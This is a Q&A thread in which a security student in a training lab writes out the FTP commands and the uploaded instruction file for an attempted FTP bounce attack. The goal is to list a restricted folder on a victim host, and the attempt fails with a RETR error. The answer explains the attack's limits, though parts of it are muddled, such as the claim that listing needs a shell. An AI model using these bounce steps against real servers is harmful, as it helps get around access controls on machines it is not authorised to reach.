1

I'm studying security in a training lab, and I'm trying to implement the infamous FTP-bounce attack. I'll use a remote FTP server (called BOUNCE here) in order to access a folder on the VICTIM machine which is forbidden for my IP address. I don't know if the VICTIM machine allow access to the forbidden folder to BOUNCE, but it's still worth trying :).

Here is what I do:

I start my own pure-ftp server and connect to it:

service pure-ftpd start

~# ftp My_IP 21
ftp> USER my_own_username

Then, I tell my server to go into passive mode, It answers with an Ip address (which is my own IP address) and a PORT with a shape like: (F,F,F,F,X,X) I take note of it for later.

ftp> quote "pasv"   
Entering Passive Mode (F,F,F,F,X,X)

And finally, I tell my server to accept data from the data channel and store them into foobar file, if it does not exists, the server creates one.

ftp> quote "stor foobar"

After this, my server (which is in passive mode now) will hang...

Now I'm going to use a FTP-bounce vulnerable server (which I found thanks to nmap displaying the message "Ftp-Bounce Working !") which I'll call "Bounce". If I understood correctly this latter is abble to connect to other FTP servers using the PORT command. Luckily I can connect to Bounce anonymously and upload some files on it using the PUT command.

Next, I'll import the following file onto Bounce:

user anonymous
pass whatyouwant
cd /restricted-folder
port F,F,F,F,X,X
ls
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
...

It will then be uploaded from Bounce to the Victim Machine in order to let this latter execute the instructions in in.

I do this with those last commands (still on Bounce):

put instrs
quote "port C,C,C,C,0,21"
quote "retr instrs"

Where C,C,C,0,21 is the IP of the victim machine (let's call it VICTIM). (so It will connect on VICTIM, and tell it to execute the instruction in instrs file, if I understood correctly).

Problem: just after the command quote "retr instrs I get the following error: 501 Cannot RETR. Error

So, I'm wondering, is It VICTIM or BOUNCE that prevent the RETR command too work ? Tell me also, If you think I misunderstood something. Thanks a lot for you attention.

ahg8tOPk78
  • 61
  • 1
  • 4

1 Answers1

0

You have not understood FTP Bounce attacks.

FTP Bounce attacks does not let a FTP connect to another one, but to request access to ports by using the command PORT. It's mostly used to make a port-scan without being detected (as you are not the one doing it, but the FTP server for you), or even for D.o.S. attacks.

Turning this FTP-bounce to upload a file from a FTP server to another (as it seems you want to do, sorry if i misunderstood you) requires much more than this.

So PORT command may work, but not RETR

KanekiDev
  • 1,039
  • 6
  • 9
  • just to be clear, when nmap says "FTP Bounce working" it means that the machine is abble to send PORT command, right ? – ahg8tOPk78 Oct 17 '16 at 14:44
  • What I want to achieve is only to see the content of a forbiden folder (see the "ls" command in the file I'm sending to the BOUNCE server) – ahg8tOPk78 Oct 17 '16 at 14:45
  • When NMAP gives you that advice, it means the server is vulnerable to those attacks. So yes, you're able to tell the FTP server to send PORT command to any other machine. – KanekiDev Oct 17 '16 at 14:46
  • listing a folder requires more than PORT command. Using PORT you tell the server that "you are waiting for a connection in a specified address (ip+port)", sending commands like ls requires (for example) a shell. It cannot be achieved just only by ftp-bouncing – KanekiDev Oct 17 '16 at 14:47
  • Ok, so if I get the error message, It mean that the "bouncable" server does not provide the RETR function, it is right ? – ahg8tOPk78 Oct 17 '16 at 14:52
  • yes, it means so just by the error message. – KanekiDev Oct 17 '16 at 14:56
  • Ok, I don't see why I would need a shell as "ls" is also a ftp command (and the most accepted command on every FTP server I guess)... – ahg8tOPk78 Oct 17 '16 at 15:02
  • yep, that's right... but if you can't list a private folder using ls, you are trying to list it by using ftp-bounce (as far that's what i understood, sorry if i misunderstood that part of your question) so you need to gain privileges or a full shell. But that would require not ftp-bounce attack but a Site-to-Site Transfer Attack. – KanekiDev Oct 17 '16 at 15:05